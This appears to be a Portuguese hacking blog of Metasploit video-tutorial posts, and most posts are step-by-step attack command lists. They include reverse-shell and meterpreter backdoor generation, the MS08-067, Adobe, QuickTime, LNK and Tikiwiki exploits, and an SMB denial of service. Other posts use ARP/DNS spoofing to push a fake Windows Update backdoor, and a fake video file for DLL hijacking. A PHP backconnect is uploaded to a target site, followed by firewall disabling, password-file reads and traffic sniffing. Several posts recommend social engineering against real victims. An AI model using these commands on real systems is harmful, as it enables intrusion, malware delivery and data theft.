banner468

Mostrando postagens com marcador Metasploit. Mostrar todas as postagens
Mostrando postagens com marcador Metasploit. Mostrar todas as postagens

sexta-feira, 10 de dezembro de 2010

Armitage - Interface gráfica para Metasploit

O Armitage me chamou muita atenção, a primeira vez que utilizei o programa, pode perceber que se tratava de um ótimo programa e um pouco parecido com o "Canvas", foi o que me levou a fazer uma requisição para que a ferramenta pudesse se adicionada no BackTrack, uma das distro prediletas.

O topico da requisição:
http://www.backtrack-linux.org/forums/tool-requests/35521-armitage-%96-cyber-attack-management-metasploit.html 
O programa esta disponíveis nos repositórios do backtrack, basta ir no shell e atualizar a distro:
# apt-get update && apt-get upgrade

Depois vai no menu Dragon > BackTrack > Penetration > Armitage

Qualquer um pode contribuir com tools que se encaixam da ideologia da distro, nesse link:
http://www.backtrack-linux.org/forums/tool-requests/ 
Agora vamos fazer um pouco sobre ela:


                            Armitage




Armitage é uma ferramenta de gestão gráfica cyber ataque para Metasploit que visualiza suas targets, recomenda exploits e expõe as capacidades avançadas do framework. Armitage visa tornar Metasploit utilizável para os profissionais de segurança que compreendem hacking. Se você quer aprender e crescer em Metasploit cos recursos avançados, Armitage pode ajudá-lo.


Manual: 
http://www.fastandeasyhacking.com/manual

Videos:  
http://www.youtube.com/watch?v=kdtMthVeC1M
http://www.youtube.com/watch?v=EACo2q3kgHY

Screenshots:  
http://www.fastandeasyhacking.com/images/screenshots/launch.png
http://www.fastandeasyhacking.com/images/screenshots/armitage4.png
Baixar:  
http://www.fastandeasyhacking.com/download

Metasploit Unleashed: 
http://www.offensive-security.com/metasploit-unleashed/Armitage
Instalação: http://www.offensive-security.com/metasploit-unleashed/Armitage_Setup
Scanning: http://www.offensive-security.com/metasploit-unleashed/Armitage_Scanning
Exploração: http://www.offensive-security.com/metasploit-unleashed/Armitage_Exploitation

Ref: http://www.fastandeasyhacking.com/ 


Estarei produzindo algumas aulas futuramente.
[]'

domingo, 28 de novembro de 2010

Dll Hijacking em Windows 7


Nessa aula vou mostrar a técnica de dll hijacker, ela consiste em colocar ou substituir uma dll padrão do sistema operacional por uma dll maliciosa. Uma vez que a dll maliciosa tenho sido modificada, e necessário que ela esteja na mesma pasta do arquivo vulnerável ou substituída o arquivo original na maquina alvo, essa falha e antiga e já vem sendo discutida a mais de 10 anos. Não vou alongar muito o texto, caso queiram saber mais informações, leia as referencias abaixo.
Nesse link você vão pode encontrar uma lista de DLL´s vulneráveis e seus respectivos programas:
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/

Na vídeo aula, crio uma dll maliciosa e um aquivo de vídeo  falso. Fiz de forma simples, não deixei a dll oculta para o melhor entendimento da vídeo, mas para esse ataque se bem sucedido deve envolver um pouco de engenharia social.

Comandos:
msfpayload windows/meterpreter/reverse_https LHOST=IP LPORT=443 D > /Diretório para ser salvo o arquivo/ehtrace.dll
touch Video.flv
use multi/handler
set lhost IP
set lport 443
set payload windows/meterpreter/reverse_https
exploit


Sobre a aula:
Tamanho: 69 Mb
Formato: AVI
Duração: 4:29
Musica: Hip-Hop – Hot shif once again
Baixar: http://www.4shared.com/file/yqv2OQRJ/Dll-hijacker_Windows_7_.html
On line: http://vimeo.com/17250307





REF:
http://en.wikipedia.org/wiki/DLL_Hijacking
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://en.wikipedia.org/wiki/Dynamic-link_library
http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
http://www.rec-sec.com/2009/05/12/dll-hijacking-vulnerability/
http://www.informationweek.com/news/windows/security/showArticle.jhtml?articleID=228200659

domingo, 7 de novembro de 2010

Denial of Service em Windows (DoS)

_| Introdução |_
Olhando alguns auxiliares do mestasploit, resolvi procurar algum pra DoS.
O que encontrei e para ataque em rede local, pesquisando um pouco mais sobre essa falha, descobri que módulo explora uma falha no SRV.Sys driver do sistema operacional Windows.

É afetas as versões do Windows:
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

_| Comandos |_
nmap -O 192.168.1.1/24 
msfconsole
use dos/windows/smb/ms06_063_trans
set lport 445 (Essa opção vem configurada por padrão)
run

_| Sobre a vídeo |_
Tamanho:  18.7 Mb
Formato: AVI
Duração: 4:35
Musica: Afoga o ganso - Turma da 98
Baixar: http://www.4shared.com/file/UX4fFsVH/DOS-Windows.html




_| Referencias |_
http://pt.wikipedia.org/wiki/Ataque_de_nega%C3%A7%C3%A3o_de_servi%C3%A7o
http://www.osvdb.org/27644
http://www.microsoft.com/technet/security/bulletin/MS06-063.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3942
http://www.securityfocus.com/bid/19215
http://www.metasploit.com

domingo, 31 de outubro de 2010

Explorando vulnerabilidade no Tikiwiki

 ______
/ Sinopse \________________________

Vou mostrar nessa vídeo aula um ataque ao serviço Tikiwiki, que é o serviço de gerenciamento de conteúdo através da web.
Primeiramente rodei um postscan (Nmap) em uma determinado host, logo encontrando a porta 80 aberta(Porta de serviço web), testei em um navegador para testa se o serviço realmente estava funcionando, logo apos usei o Dirbuster para listar os diretórios do serviço web. Testei alguns ate encontrar o campo de login.
Com essa informações em mãos, parti para o ataque, mostrei a auditoria com o metasploit e manual, como vocês vão pode observar, podemos obter o mesmo resultado.

 __________________
/ Informações adicionais \___________

O serviço Tikiwiki estava rodando em um sistema operacional Ubuntu 8.04 modificado pela equipe do Metasploit e chamado de Metasploitable.
A equipe do Metasploit procurei colocar o máximo de vulnerabilidades possíveis, e uma ótima distro para teste de penetração.
As vulnerabilidades: http://www.metasploit.com/documents/express/Metasploitable.txt
Baixar o ISO(torrent): http://www.metasploit.com/documents/express/Metasploitable.zip.torrent

 ________
/ Comandos \________________________

nmap 192.168.1.4
java -jar DirBuster-0.12.jar -u http://192.168.1.4
msfconsole
search tikiwiki
use use admin/tikiwiki/tikidblib
set RHOST 192.168.1.4
exploit
tiki-listpages.php?offset=0&sort_mode=
mysql -h 192.168.1.105 -u root -p root
show databases;
use tikiwiki195;
show tables;
select * from users_users;
http://192.168.1.4/tikiwiki/backups/shell-reverso.php
nc -lvp 8080
cat /etc/passwd
search tikiwiki
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options
show payloads
setg payload generic/shell_bind_tcp
set lhost 192.168.1.5
set rhost 192.168.1.5
show options
exploit
ls
whoami
cat /etc/passwd

 ___________
/ Sobre o Video \____________________

Tamanho: 40.08 Mb
Formato: AVI
Duração: 12:54
Musica: Clint Mansell - Requiem for a Dream
Autor: Fabiano Matias
Baixar: http://www.4shared.com/file/Z6nHD7AX/tikiwiki.html
On line: http://www.vimeo.com/16375616







 _________
/ Referencias \______________________

http://www.backtrack-linux.org/forums/backtrack-videos/
http://blog.metasploit.com/2010/05/introducing-metasploitable.html
http://www.metasploit.com/documents/express/Metasploitable.txt
http://www.metasploit.com/
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
http://nmap.org
http://pt.wikipedia.org/wiki/TikiWiki
http://www.exploit-db.com/exploits/2701/
http://pentestmonkey.net/tools/php-reverse-shell/
http://www.metasploit.com/documents/express/Metasploitable.zip.torrent
http://www.osvdb.org/30172
http://www.securityfocus.com/bid/20858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5702
http://secunia.com/advisories/22678/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5423
http://www.osvdb.org/40478
http://www.securityfocus.com/bid/26006

Publicado nos parceiros do Blog:

http://www.darkside-forums.com.br/ipb/topic/446-vulnerabilidade-no-tikiwiki/
http://www.chmod.com.br/vb/showthread.php?10388-Vulnerabili**de-no-TikiWiki
http://www.re-b.net/home/viewtopic.php?f=41&t=325
Forum-underground no momento em manutenção

quinta-feira, 16 de setembro de 2010

Vulnerabilidade no Adobe Reader 9.3.4(0day)


Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores. Mas uma vez o Metasploit na frente de seus concorrentes... :P

Comandos:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler

Sobre o Vídeo: 
Formato:  AVI
Tamanho:  18.8 MB
Duração: 5:59 min
Musica:  Carl Orff - Carmina Burana - O Fortuna

Ref:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html

domingo, 12 de setembro de 2010

Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)


Nessa aula mostro como explorar a vulnerabilidade no QuickTime, essa vulnerabilidade e classificada de 0day e afeta todas as versões do QuickTime e do Windows. Ela foi descoberta pelo Investigador de segurança Ruben Santamarta.

Comandos:
use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST SeuIP
set SRVPORT 80
set URIPATH /
set payload windows/shell/reverse_tcp
set LHOST SeuIP
set LPORT 5050
exploit

Sobre o Vídeo:
Formato:  AVI
Tamanho: 8.2 MB
Duração: 3:57 min
Musica: Mantenha o Respeito - Marcelo D2 
Baixar: http://www.4shared.com/file/eKgQCHTr/0day-quicktime.html




Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1818
http://www.osvdb.org/67705
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1

SET + Metasploit - WebDAV DLL hijacker

Nessa aula mostro com explorar WebDAV DLL hijack usando o SET integrado com Metasploit.


Sobre o Vídeo:
Formato:  AVI
Tamanho: 12.5 MB
Duração: 3:12 min
Musica: Toca uma regueira aí - Armandinho

Baixar: http://www.4shared.com/file/X6cJru8-/SET-DLL_Hijacker.html

Ref:
http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt

quinta-feira, 9 de setembro de 2010

Metasploit - Mudando o Banner


Vídeo aula simples de como trocar o banner do metasploit, a aula foi feita a pedido de um usuario do blog. Qualquer duvida reporte abaixo.

Baixar: http://www.4shared.com/file/Yp_AdMBB/Mudando_banner.html




terça-feira, 7 de setembro de 2010

Vulnerabilidade de atalho do Windows - CVE-2010-2568 - Metasploit + Ettercap



Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.
Maiores informações em:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx

O que eu fiz?
Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo um MITM, e direcionando todo trafego da minha rede local para minha maquina.

Comandos:
use windows/browser/ms10_046_shortcut_icon_dllloader
set LHOST 192.168.1.4
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //

Sobre o Vídeo:
Formato: AVI
Tamanho: 12.6 MB
Duração: 4:45 min
Autor: Fabiano Matias aka Bhior
Musica:  Cachimbo da paz - Gabriel o Pensador
Baixar: http://www.4shared.com/file/MzP5k2eD/Windows_LNK_CVE-2010-2568.html

Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568
http://www.osvdb.org/66387
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx
http://adrenaline.com.br/seguranca/noticias/5616/criminosos-exploram-icones-de-atalhos-para-espalhar-malware.html

domingo, 29 de agosto de 2010

Metasploit - Desabilitando Firewall



O que acontece?
Configurei o firewall do Windows XP sp2 contra postscan, rodo o nmap e ele nos mostra todas as porta filtradas. Então executo um backdoor na maquina windows, ganho acesso ao shell do sistema (cmd.exe ou prompt de comando) e desabilito o firewall.
O comando usado na aula e nativo do sistema operacional Windows e não um recurso do metasploit.
Minha intenção nessa aula e de mostrar a importância de se conhecer um sistema operacional a fundo. 

Comandos: 
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost MeuIP
set lport Porta
exploit
netsh firewall set opmode disable

Video:
Formato: AVI(.rar)
Duração: 4:15 m
Tamanho: 10.6 MB
Autor: Fabiano Matias aka Bhior
Musica: Vinny - Heloísa, mexe a cadeira

Baixar: http://www.4shared.com/file/IrHQby36/Desabilitando_firewall.html
On-line: http://vimeo.com/14528642

Ref:
http://support.microsoft.com/kb/947709/pt-br
http://technet.microsoft.com/pt-br/library/cc778925%28WS.10%29.aspx
www.metasploit.com
www.nmap.org 

quinta-feira, 12 de agosto de 2010

Instalando metasploit no Ubuntu

O Metasploit Framework é bem suportado na plataforma Ubuntu. As instruções a seguir devem ser igualmente aplicáveis para Kubuntu, Xubuntu, e Debian.

Dependências:

 
Instale as dependências do Ruby:
$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

Instale o cliente do Subversion:
$ sudo apt-get install subversion

Para construir as extensões nativas (pcaprub, lorcon2, etc), os seguintes pacotes precisam ser instalados:
$ sudo apt-get build-dep ruby
$ sudo apt-get install ruby-dev libpcap-dev

Suporte de banco de dados

A fim de usar a funcionalidade de banco de dados, RubyGems junto com os drivers apropriados devem estar instalados:
Postgres é o banco de dados recomendado:
$ sudo apt-get install postgresql-8.4
$ sudo apt-get install rubygems libpq-dev
$ sudo gem install pg

Ou para o MySQL:
$ sudo apt-get install mysql-server
$ sudo apt-get install rubygems libmysqlclient-dev
$ sudo gem install mysql

Sqlite irá trabalhar para tarefas básicas, mas não é mais suportado!
$ sudo apt-get install sqlite3
$ sudo apt-get install rubygems libsqlite3-dev
$ sudo gem install sqlite3-ruby

Consulte as instruções do banco de dados de configuração(abaixo), quando você tiver concluído a instalação.

Framework


Uma vez que a dependência tenha sido instalado, baixe o Metasploit para Linux da página de download(http://www.metasploit.com/framework/download/) e execute os seguintes comandos:

$ tar xf framework-3.X.tar.gz
$ sudo mkdir -p /opt/metasploit3
$ sudo cp -a msf3/ /opt/metasploit3/msf3
$ sudo chown root:root -R /opt/metasploit3/msf3
$ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/

Ou:
$ sudo su
# chmod +x framework-3.X.X-linux-XXXX.run
# ./framework-3.X.X-linux-XXXX.run

Extensões


O quadro inclui algumas extensões nativas Ruby que deve ser compilado para usar certos tipos de módulos.
Para ativar o módulo socket: 

$ sudo apt-get install libpcap-dev
$ sudo bash
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install

Para habilitar os módulos Wi-Fi:
$ sudo bash
# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

Atualizações


O Metasploit Framework é atualizado diariamente com os últimos exploits, , payloads, features(recursos) e correções de bugs. Para atualizar a instalação do framework:
$ sudo svn update /opt/metasploit3/msf3/

Isso também pode ser instalado em crontab do usuário root:
$ sudo crontab -e -u root # inserar a linha abaixo
 1 * * * * /usr/bin/svn update  /opt/metasploit3/msf3/ >> /var/log/msfupdate.log 2>&1



Ref: http://www.metasploit.com

domingo, 18 de julho de 2010

Atualização falsa [MITM+ettercap+metasploit+ES]


Nela aula eu mostro como usar engenharia social para efetuar um ataque. Na vídeo eu faço um MITM para redirecionar todo trafego de um host para meu micro, crio um backdoor com metasploit, faço uma pagina falsa de atualização do Windows que está em meu micro e inicio o apache, e espero que nosso alvo caia na engenharia social e execute o arquivo para que possamos ter acesso a maquina dele.

Programas usados:
Metasploit
Ettercap

Comandos:
msfpayload windows/meterpreter/reverse_tcp LHOST=SeuIP LPORT=8080 X > /NomeDoArquivo.exe
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost SeuIP
set lport 8080
exploit
*.*.* A SeuIP
echo 1 > /proc/sys/net/ipv4/ip_forward
ettercap -T -q -P dns_spoof -M ARP /IP do Router/ /IP do alvo/
/etc/init.d/apache2 start


HTML da pagina falsa: 

http://pastebin.com/PnVYNBqn
http://img831.imageshack.us/img831/9779/microsoft.jpg 


Informações:
Metasploit - www.metasploit.com
Ettercap - http://ettercap.sourceforge.net/index.php
MITM - http://en.wikipedia.org/wiki/Man-in-the-middle_attack
Backdoor - http://pt.wikipedia.org/wiki/Backdoor

Sobre a falha: http://www.microsoft.com/brasil/technet/security/Bulletin/MS08-067.mspx

Sobre o vídeo:
Tamanho: 34.5 mb
Formato: avi
Duração: 10:46 min
Musica: Tokens - The Lion Sleeps Tonight


Baixar: http://www.4shared.com/file/aAg8RG3f/Atualizao_falsa-MITMEttercapme.html





sábado, 17 de julho de 2010

Backdoor - Shell reverse para Linux

Nessa vídeo aula, eu usei o metasploit para criar uma carga de shell reverse para sistema operacional linux. Deixo o netcat escutando na porta escolhido aguardando o arquivo ser executado em uma maquina linux.
 

Comandos:
/pentest/exploits/framework3/msfpayload linux/x86/shell_reverse_tcp LHOST=SeuIP LPORT=5050 C
nc -lvp 5050 

Programas usados:
Metasploit
Netcat


Informações:
Metasploit: www.metasploit.com
Conexão reversa: http://en.wikipedia.org/wiki/Reverse_connection
Linux: http://pt.wikipedia.org/wiki/Linux
Netcat: http://pt.wikipedia.org/wiki/Netcat


Sobre o video:
Tamanho: 13 mb
Duração:  5:44 m
Musica: Skazi - Anarchy

Créditos da vídeo vai para meu colega spawn!


Baixar: http://www.4shared.com/file/M6Po3L8y/Backdoor-Shell_reverser_linux.html




quarta-feira, 14 de julho de 2010

Backconnect em php - Metasploit

Ola pessoal, nesse tutorial vou mostrar com fazer um backconect em php encondado em base64, para temos acesso ao shell via conexão reversa.

Siga os seguinte passos:








Salve com extensão .php, faça upload do arquivo no servidor do site desejado.

Agora vamos deixar o netcat escutando na porta 2121.




Agora acionamos o arquivo Ex:

hxxt://www.site.com.br/imagem/Bhior.php?

É pronto... temos acesso a shell do site.

Programas usados:
Metasploit - http://www.metasploit.com/
Netcat - http://www.downloadnetcat.com/

Instalando o netcat no debian/ubuntu

root@bt:~# apt-get install netcat

Para versão de linux que utilizam pacotes rpm.

root@bt:~# rpm -Uvh netcat-version.rpm

Para os que preferem compilar os pacotes.

root@bt:~# wget http://osdn.dl.sourceforge.net/sourc...t-0.7.1.tar.gz

Vamos agora descompactar o pacote, entrar no diretório descompactado, e executar o script ‘configure’.

root@bt:~# tar -xzf netcat-0.7.1.tar.gz

root@bt:~# cd netcat-0.7.1

root@bt:~/netcat-0.7.1# ./configure

root@bt:~/netcat-0.7.1# make


Se você tiver problema com o comando make use o 'make install' se você tem os privilégios necessários, ou você pode simplesmente executar "src/netcat", que terá sido construído após uma bem-sucedida 'make'

Neste ponto, você já deve ter uma construção bem sucedida de netcat em algum lugar no seu sistema.

Lembrando que isso e para fins educacionais, não me responsabilizo pelo seu mau uso.

Como não tinha um domínio para eu poder demostra isso em vídeo, e logicamente que não iria me apoderar de domínios alheios(risos) para a pratica da vídeo, eu pedir a um colega, o Marcelo Moraes dono do site compilando ideia que e um dos parceiros do meu blog para poder fazer a vídeo aula em seu domínio.

Assitam on line:
youtube:

http://www.youtube.com/watch?v=NFtdecqCAV4


Site compilandoideias:
http://www.compilandoideias.com.br/Videos/video2.html

domingo, 11 de julho de 2010

Backdoor - Shell reverse com metasploit para windows

Nessa aula eu demostro com criar um backdoor simples para sistemas operacionais windows, uso o msfpayload e crio uma carga de shell reverso com ele no formato .exe.

Comandos:
  • msfpayload windows/meterpreter/reverse_tcp LHOST=SeuIP LPORT=8080 X > /root/backdoor.exe
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost SeuIP
  • set lport 8080
  • exploit

Infos:
Metasploit -  www.metasploit.com
Informações sobre backdoor - http://pt.wikipedia.org/wiki/Backdoor
Conexão reversa - http://en.wikipedia.org/wiki/Reverse_connection 


Sobre a video:
Formato: avi
Duração: 6:05 min
Musica: A cera - O surto


Baixar: http://www.4shared.com/file/A2mX5gzP/Backdoor.html





domingo, 30 de maio de 2010

Invasão em micro Linux

Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo clique aqui!

O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.

Comandos:


Citação:

nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit

use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit
Programas usados:
Metasploit
Nmap

Ambiente da aula e em uma distro Linux, lembrando que pode ser em qualquer sistema operacional que rode o metasploit.

Obs: O pessoal ja engessou que sistema operacional linux e seguro que Windows e vulnerável. O Linux da uma camada a mais de segurança, mas possui vulnerabilidades também. Sempre atualize.

Baixar:

Assisti on-line:

Citação:

http://bhior.blip.tv/file/3689430

sexta-feira, 28 de maio de 2010

Remote Desktop com VNC via metasploit

Mostro com acessar um desktop remotamente com VNC via metasploit uma de muitas ferramentas encontradas no metasploit.

O que eu fiz?
Configurei o metasploit para injetar uma carga vncinject usando o exploit ms08_067_netapi

Comandos:
use exploit/windows/smb/ms08_067_netapi
set RHOST IP_da_vitima
set PAYLOAD windows/vncinject/bind_tc
exploit
O ambiente da aula e numa distro linux "backtrack 4", mas pode ser usando em qualquer SO que rode metasploit.


Baixar: http://www.4shared.com/file/olS5vapb/Remote_desktop_VNC.html

Assisti on line: http://blip.tv/file/3686233

terça-feira, 18 de maio de 2010

Video Demo - Vulnerabilidade da tecla F1

No dia 26 de fevereiro de 2010 foi notificado uma alerta de segurança aos usuários do sistema operacional Windows XP, para que pressionar a tecla F1, quando estivesse navegando pela internet com Internet Explorer, pois poderia ser vitima de um ataque possibilitando acesso total a maquina.

“A vulnerabilidade existe no jeito que o VBScript interage com arquivos de ajuda do Windows usando o Internet Explorer”, diz o boletim. “Se um site malicioso mostrar uma caixa de diálogo e o usuário apertar a tecla F1, códigos arbitrários podem ser executados."



O exploit usando esta nos repositório do metasploit, caso não encontre, faça uma atualização no console do metasploit com comando "svn update".

Vídeo aula Demo.


Baixar: http://www.4shared.com/file/r8dKHSbe/Demo_Vul_F1.html

Assistir on-line:  http://blip.tv/file/3641612

Obs: Esse tipo de ataque tem quer ser usando com uma boa ES.

segunda-feira, 17 de maio de 2010

Metasploit - Sniffer via meterpreter

Essa video e sobre sniffer via meterpreter em um micro invadido.

O que eu fiz?
Invadir um micro usando Windows XP SP2 com o metasploit e rodei o modulo sniffer.

Comando:


Citação:

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST IP_do_alvo
exploit
use sniffer
sniffer_interfaces
sniffer_start 1 200000
sniffer_stats 1
sniffer_dump 1 /local_destino_do_log.cap
sniffer_stop 1
Baixar: http://www.4shared.com/file/yI6r3wVP/Metasploit-meterprete_sniffer.html

Assisti on-line: http://bhior.blip.tv/file/3629529

quinta-feira, 13 de maio de 2010

Metasploit - Explorando falha MS08-067

Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.

Programas usados:

Metasploit framework 3
Nmap

Exploit usado:
Citação:
ms08_067_netapi
Payload(carga) usado:
Citação:
shell_reverse_tcp
Tudo encontrado no BackTrack 4.

Solução da falha: Clique aqui

Comandos:
Citação:
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit


Baixar: http://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm

Assistir on-line: http://bhior.blip.tv/file/3534979

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers